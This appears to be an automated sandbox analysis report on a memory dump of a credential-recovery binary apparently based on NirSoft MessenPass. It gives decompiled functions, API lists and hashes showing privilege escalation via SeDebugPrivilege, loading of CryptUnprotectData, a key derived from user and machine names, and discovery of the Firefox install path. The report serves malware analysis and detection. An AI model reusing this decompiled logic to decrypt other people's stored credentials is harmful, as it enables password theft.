Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
Opcode Fuzzy Hash: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00407C79, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C79(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24);
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}

0x00407c8a
0x00407c95
0x00407c99
0x00407c9d
0x00407ca1
0x00407ca5
0x00407ca9
0x00407cad
0x00407cb1
0x00407cb5
0x00407cb9
0x00407cbd
0x00407cc1
0x00407cc5
0x00407cc9
0x00407ccd
0x00407cd1
0x00407cd5
0x00407cdb
0x00407ce9
0x00407cef
0x00407d02
0x00407d09
0x00407d17
0x00407d1e
0x00407d29
0x00407d3a
0x00407d3d
0x00407d40
0x00407d51
0x00407d54
0x00407d73
0x00407d88
0x00407d96
0x00407da0
0x00407da5
0x00407da8
0x00407db2
0x00407dbd
0x00407dc2
0x00407dc4
0x00407dca
0x00407dcd
0x00407dd3
0x00407dd9
0x00407dd9
0x00407ddd
0x00407de0
0x00407de9
0x00407deb
0x00407df2
0x00407df3
0x00407dca
0x00407dfb
0x00407dfd
0x00407e00
0x00407e06
0x00407e0c
0x00407e0c
0x00407e15
0x00407e18
0x00407e21
0x00407e23
0x00407e26
0x00407e27
0x00407dfd
0x00407e30

APIs

memset.MSVCRT ref: 00407CDB
memset.MSVCRT ref: 00407CEF
memset.MSVCRT ref: 00407D09
memset.MSVCRT ref: 00407D1E
GetComputerNameA.KERNEL32(?,?), ref: 00407D40
GetUserNameA.ADVAPI32(?,?), ref: 00407D54
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
strlen.MSVCRT ref: 00407D91
strlen.MSVCRT ref: 00407DA0
memcpy.MSVCRT ref: 00407DB2

Strings

5, xrefs: 00407CBD
}, xrefs: 00407CC1
O, xrefs: 00407CC5
H, xrefs: 00407CD1
i, xrefs: 00407CA1
b, xrefs: 00407CA9
}, xrefs: 00407CCD

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
String ID: 5$H$O$b$i$}$}
API String ID: 1832431107-3760989150
Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410DE1, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0

Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0

GetLastError.KERNEL32(00000000), ref: 00410E02
GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
FindCloseChangeNotification.KERNELBASE(?,?,?,00000000), ref: 00410E78

Strings

AdjustTokenPrivileges, xrefs: 00410E53
SeDebugPrivilege, xrefs: 00410E2E
LookupPrivilegeValueA, xrefs: 00410E1D

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
API String ID: 2949824235-164648368
Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404C9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C9D(struct HINSTANCE__** __eax, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__** _t11;

				_t11 = __eax;
				E00404CE0(__eax);
				_t7 = LoadLibraryA("crypt32.dll"); // executed
				 *_t11 = _t7;
				if(_t7 != 0) {
					_t10 = GetProcAddress(_t7, "CryptUnprotectData");
					_t11[2] = _t10;
					if(_t10 != 0) {
						_t11[1] = 1;
					}
				}
				if(_t11[1] == 0) {
					E00404CE0(_t11);
				}
				return _t11[1];
			}

0x00404c9e
0x00404ca0
0x00404caa
0x00404cb2
0x00404cb4
0x00404cbc
0x00404cc4
0x00404cc7
0x00404cc9
0x00404cc9
0x00404cc7
0x00404cd4
0x00404cd6
0x00404cd6
0x00404cdf

APIs

Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB

LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

Strings

crypt32.dll, xrefs: 00404CA5
CryptUnprotectData, xrefs: 00404CB6

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 145871493-1827663648
Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798

Uniqueness

Uniqueness Score: -1.00%

Function 00407898, Relevance: 6.1, APIs: 4, Instructions: 58
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407898(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t6 =  &(_t40[0x52]); // 0x247
					_t16 = FindNextFileA(_t15, _t6); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00407930(_t40);
						goto L4;
					}
				} else {
					_t1 =  &(_t40[0x52]); // 0x247
					_t2 =  &(_t40[1]); // 0x103
					_t26 = FindFirstFileA(_t2, _t1); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t9 =  &(_t40[0xa2]); // 0x387
						_t38 = _t9;
						_t10 =  &(_t40[0x5d]); // 0x273
						_t28 = _t10;
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen(_t10) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E00406B4B(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}

0x0040789a
0x0040789c
0x004078a1
0x004078c4
0x004078cc
0x004078d4
0x004078d8
0x00000000
0x004078da
0x004078da
0x00000000
0x004078da
0x004078a3
0x004078a3
0x004078aa
0x004078ae
0x004078bc
0x004078be
0x004078df
0x004078e4
0x004078e6
0x004078e9
0x004078e9
0x004078ef
0x004078ef
0x004078f5
0x004078fc
0x00407914
0x00407923
0x00407916
0x0040791a
0x00407920
0x00407928
0x004078e4
0x0040792f

APIs

FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
strlen.MSVCRT ref: 004078FC
strlen.MSVCRT ref: 00407904

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FileFindstrlen$FirstNext
String ID:
API String ID: 379999529-0
Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755

Uniqueness

Uniqueness Score: -1.00%

Function 0041208B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 00412098
SizeofResource.KERNEL32(?,00000000), ref: 004120A9
LoadResource.KERNEL32(?,00000000), ref: 004120B9
LockResource.KERNEL32(00000000), ref: 004120C4

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C66A, Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 185
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040C66A(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t56;
				struct HINSTANCE__* _t59;
				void* _t61;
				void* _t65;
				void* _t67;
				void* _t73;
				void* _t83;
				void* _t86;
				void* _t88;
				intOrPtr _t89;
				void* _t91;
				void* _t96;
				void* _t97;
				void* _t111;
				struct HWND__* _t112;
				intOrPtr* _t123;
				void* _t124;
				void* _t126;

				_t124 = _t126 - 0x68;
				 *0x41dbd4 =  *(_t124 + 0x70);
				_t56 = E00404D7A(__ecx);
				if(_t56 != 0) {
					0x412192(_t111);
					_t112 = 0;
					 *(_t124 + 0x70) = 0;
					0x410de1(); // executed
					__eflags =  *(_t124 + 0x70);
					if( *(_t124 + 0x70) != 0) {
						FreeLibrary( *(_t124 + 0x70));
					}
					 *0x41e150 = 0x11223344; // executed
					EnumResourceTypesA( *0x41dbd4, 0x412111, _t112);
					_t59 =  *0x41e150; // 0xe17b5ca0
					__eflags = _t59 - 0xe17b5ca0;
					 *(_t124 + 0x70) = _t59;
					if(_t59 == 0xe17b5ca0) {
						_t61 = E0040731C(_t124 + 0x34);
						 *((intOrPtr*)(_t124 + 0x5c)) = 0x20;
						 *(_t124 + 0x54) = _t112;
						 *(_t124 + 0x60) = _t112;
						 *(_t124 + 0x58) = _t112;
						 *(_t124 + 0x64) = _t112;
						E0040C427(_t61, _t124 - 0x384);
						 *((intOrPtr*)(_t124 + 0x14)) = _t124 + 0x34;
						E0040763D(__eflags, _t124 + 0x34,  *((intOrPtr*)(_t124 + 0x78)));
						_t65 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/savelangfile", 0xffffffff);
						__eflags = _t65;
						if(_t65 < 0) {
							E0040902B(); // executed
							_t67 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/deleteregkey", 0xffffffff);
							__eflags = _t67;
							if(_t67 < 0) {
								__eflags =  *(_t124 + 0x70) + 0x1e84a361 - 1;
								if( *(_t124 + 0x70) + 0x1e84a361 != 1) {
									L28:
									 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
									0x413d56( *((intOrPtr*)(_t124 + 8)));
									__eflags =  *(_t124 + 4) - _t112;
									if( *(_t124 + 4) != _t112) {
										DeleteObject( *(_t124 + 4));
										 *(_t124 + 4) = _t112;
									}
									L30:
									 *((intOrPtr*)(_t124 - 0x384)) = 0x417d40;
									E0040733E(_t124 + 0x34);
									E00407A7A(_t124 + 0x54);
									E0040733E(_t124 + 0x34);
									L31:
									_t73 = 0;
									__eflags = 0;
									goto L32;
								}
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + 0x30)) - 1;
								if(__eflags <= 0) {
									L16:
									 *0x415394(_t112);
									E0040C3AF(_t124 - 0x384);
									__eflags =  *((intOrPtr*)(_t124 - 0x238)) - 3;
									if( *((intOrPtr*)(_t124 - 0x238)) != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow( *(_t124 - 0x27c), ??);
									UpdateWindow( *(_t124 - 0x27c));
									 *((intOrPtr*)(_t124 - 0x264)) = LoadAcceleratorsA( *0x41dbd4, 0x67);
									PostMessageA( *(_t124 - 0x27c), 0x415, _t112, _t112);
									_t83 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
									__eflags = _t83;
									if(_t83 == 0) {
										L27:
										 *0x415398();
										goto L28;
									} else {
										_t123 =  *0x415184;
										do {
											_t86 =  *0x415208( *(_t124 - 0x27c),  *((intOrPtr*)(_t124 - 0x264)), _t124 + 0x18);
											__eflags = _t86;
											if(_t86 != 0) {
												goto L26;
											}
											_t89 =  *0x41e1f4; // 0x0
											__eflags = _t89 - _t112;
											if(_t89 == _t112) {
												L24:
												_t91 =  *_t123( *(_t124 - 0x27c), _t124 + 0x18);
												__eflags = _t91;
												if(_t91 == 0) {
													TranslateMessage(_t124 + 0x18);
													DispatchMessageA(_t124 + 0x18);
												}
												goto L26;
											}
											_t96 =  *_t123(_t89, _t124 + 0x18);
											__eflags = _t96;
											if(_t96 != 0) {
												goto L26;
											}
											goto L24;
											L26:
											_t88 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
											__eflags = _t88;
										} while (_t88 != 0);
										goto L27;
									}
								}
								_t97 = E0040C5A4(_t124 - 0x384, __eflags);
								__eflags = _t97;
								if(_t97 == 0) {
									_t112 = 0;
									__eflags = 0;
									goto L16;
								}
								 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
								0x413d56( *((intOrPtr*)(_t124 + 8)));
								__eflags =  *(_t124 + 4);
								if( *(_t124 + 4) != 0) {
									DeleteObject( *(_t124 + 4));
									 *(_t124 + 4) =  *(_t124 + 4) & 0x00000000;
								}
								goto L30;
							}
							RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
							goto L28;
						}
						 *0x41e390 = 0x41db18;
						E00409167();
						goto L28;
					}
					MessageBoxA(_t112, "Failed to load the executable file !", "Error", 0x30);
					goto L31;
				} else {
					_t73 = _t56 + 1;
					L32:
					return _t73;
				}
			}

0x0040c66b
0x0040c678
0x0040c67d
0x0040c684
0x0040c68d
0x0040c692
0x0040c697
0x0040c69a
0x0040c69f
0x0040c6a2
0x0040c6a7
0x0040c6a7
0x0040c6b9
0x0040c6c3
0x0040c6c9
0x0040c6ce
0x0040c6d3
0x0040c6d6
0x0040c6f5
0x0040c700
0x0040c707
0x0040c70a
0x0040c70d
0x0040c710
0x0040c713
0x0040c71f
0x0040c722
0x0040c731
0x0040c736
0x0040c738
0x0040c74e
0x0040c75d
0x0040c762
0x0040c764
0x0040c783
0x0040c786
0x0040c8b3
0x0040c8b6
0x0040c8c0
0x0040c8c5
0x0040c8c9
0x0040c8ce
0x0040c8d4
0x0040c8d4
0x0040c8d7
0x0040c8da
0x0040c8e4
0x0040c8ec
0x0040c8f4
0x0040c8fb
0x0040c8fb
0x0040c8fb
0x00000000
0x0040c8fd
0x0040c78f
0x0040c793
0x0040c7d5
0x0040c7d6
0x0040c7e2
0x0040c7e7
0x0040c7ee
0x0040c7f4
0x0040c7f0
0x0040c7f0
0x0040c7f0
0x0040c7fc
0x0040c808
0x0040c829
0x0040c82f
0x0040c842
0x0040c844
0x0040c846
0x0040c8ad
0x0040c8ad
0x00000000
0x0040c848
0x0040c848
0x0040c84e
0x0040c85e
0x0040c864
0x0040c866
0x00000000
0x00000000
0x0040c868
0x0040c86d
0x0040c86f
0x0040c87c
0x0040c886
0x0040c888
0x0040c88a
0x0040c890
0x0040c89a
0x0040c89a
0x00000000
0x0040c88a
0x0040c876
0x0040c878
0x0040c87a
0x00000000
0x00000000
0x00000000
0x0040c8a0
0x0040c8a7
0x0040c8a9
0x0040c8a9
0x00000000
0x0040c84e
0x0040c846
0x0040c79b
0x0040c7a0
0x0040c7a2
0x0040c7d3
0x0040c7d3
0x00000000
0x0040c7d3
0x0040c7a7
0x0040c7b1
0x0040c7b6
0x0040c7bb
0x0040c7c4
0x0040c7ca
0x0040c7ca
0x00000000
0x0040c7bb
0x0040c770
0x00000000
0x0040c770
0x0040c73a
0x0040c744
0x00000000
0x0040c744
0x0040c6e5
0x00000000
0x0040c686
0x0040c686
0x0040c8fe
0x0040c902
0x0040c902

APIs

Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA

FreeLibrary.KERNEL32(?), ref: 0040C6A7
EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5

Strings

/savelangfile, xrefs: 0040C72C
/deleteregkey, xrefs: 0040C758
Software\NirSoft\MessenPass, xrefs: 0040C766
Error, xrefs: 0040C6DA
Failed to load the executable file !, xrefs: 0040C6DF
f-@, xrefs: 0040C8DA

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
API String ID: 1343656639-3807849023
Opcode ID: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
Opcode Fuzzy Hash: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC5, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 161
registryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00405EC5(CHAR* _a4) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void** _t44;
				void* _t49;
				void* _t51;
				char* _t54;
				char* _t55;
				char* _t63;
				char* _t67;
				CHAR* _t79;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;

				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				_t79 = _a4;
				_t44 =  &_v8;
				 *_t79 = 0;
				0x411d68(0x80000002, "SOFTWARE\Mozilla", _t44);
				_t83 = _t82 + 0x24;
				if(_t44 != 0) {
					L13:
					0x413d0c(_t79,  &_v1052);
					if( *_t79 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\Mozilla Firefox", _t79, 0x104);
						_t49 = E00405E4A(_t79); // executed
						if(_t49 == 0) {
							 *_t79 = 0;
						}
						if( *_t79 == 0) {
							GetCurrentDirectoryA(0x104, _t79);
							_t51 = E00405E4A(_t79); // executed
							if(_t51 == 0) {
								 *_t79 = 0;
							}
						}
					}
					return 0 |  *_t79 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_t54 =  &_v268;
					_v12 = 0;
					0x411dee(_v8, 0, _t54);
					_t84 = _t83 + 0x18;
					while(_t54 == 0) {
						_t55 =  &_v268;
						0x413daa(_t55, "mozilla", 7);
						_t85 = _t84 + 0xc;
						if(_t55 != 0) {
							L10:
							_v12 = _v12 + 1;
							_t54 =  &_v268;
							0x411dee(_v8, _v12, _t54);
							_t84 = _t85 + 0xc;
							continue;
						}
						_v532 = 0;
						memset( &_v531, 0, 0x104);
						_v2076 = 0;
						memset( &_v2075, 0, 0x3ff);
						0x413d9e( &_v2076, 0x3ff, "%s\bin",  &_v268);
						0x411dae(_v8,  &_v2076, "PathToExe", 0x104);
						_t63 =  &_v532;
						0x413da4(_t63, 0x5c);
						_t85 = _t85 + 0x40;
						if(_t63 != 0) {
							 *_t63 = 0;
						}
						if(_v532 != 0 && E00405E4A( &_v532) != 0) {
							_t67 =  &_v268;
							0x413d74(_t67,  &_v788);
							if(_t67 > 0) {
								0x413d0c( &_v1052,  &_v532);
								0x413d0c( &_v788,  &_v268);
								_t85 = _t85 + 0x10;
							}
						}
						_t79 = _a4;
						goto L10;
					}
					RegCloseKey(_v8);
					goto L13;
				}
			}

0x00405ee1
0x00405ee7
0x00405ef9
0x00405eff
0x00405f04
0x00405f07
0x00405f15
0x00405f17
0x00405f1c
0x00405f21
0x00406072
0x0040607a
0x00406083
0x0040608c
0x00406093
0x0040609a
0x0040609c
0x0040609c
0x004060a0
0x004060a4
0x004060ab
0x004060b2
0x004060b4
0x004060b4
0x004060b2
0x004060a0
0x004060c1
0x00405f27
0x00405f34
0x00405f3a
0x00405f3f
0x00405f4a
0x00405f4d
0x00405f52
0x00406061
0x00405f5c
0x00405f68
0x00405f6d
0x00405f72
0x00406049
0x00406049
0x0040604c
0x00406059
0x0040605e
0x00000000
0x0040605e
0x00405f81
0x00405f87
0x00405f9a
0x00405fa0
0x00405fb9
0x00405fd4
0x00405fd9
0x00405fde
0x00405fe3
0x00405fe8
0x00405fea
0x00405fea
0x00405ff2
0x0040600b
0x00406012
0x0040601b
0x0040602b
0x0040603e
0x00406043
0x00406043
0x0040601b
0x00406046
0x00000000
0x00406046
0x0040606c
0x00000000
0x0040606c

APIs

memset.MSVCRT ref: 00405EE7
memset.MSVCRT ref: 00405EFF

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00405F3A

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

_mbsnbicmp.MSVCRT ref: 00405F68
memset.MSVCRT ref: 00405F87
memset.MSVCRT ref: 00405FA0
_snprintf.MSVCRT ref: 00405FB9
_mbsrchr.MSVCRT ref: 00405FDE
_mbsicmp.MSVCRT ref: 00406012
_mbscpy.MSVCRT ref: 0040602B
_mbscpy.MSVCRT ref: 0040603E
RegCloseKey.ADVAPI32(?), ref: 0040606C
_mbscpy.MSVCRT ref: 0040607A
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4

Strings

PathToExe, xrefs: 00405FBF
mozilla, xrefs: 00405F62
%programfiles%\Mozilla Firefox, xrefs: 00406087
%s\bin, xrefs: 00405FAC
SOFTWARE\Mozilla, xrefs: 00405F0B

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
API String ID: 201549630-2797892316
Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410C4C, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410C6D

Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
Part of subcall function 00405EC5: _mbscpy.MSVCRT ref: 0040607A
Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
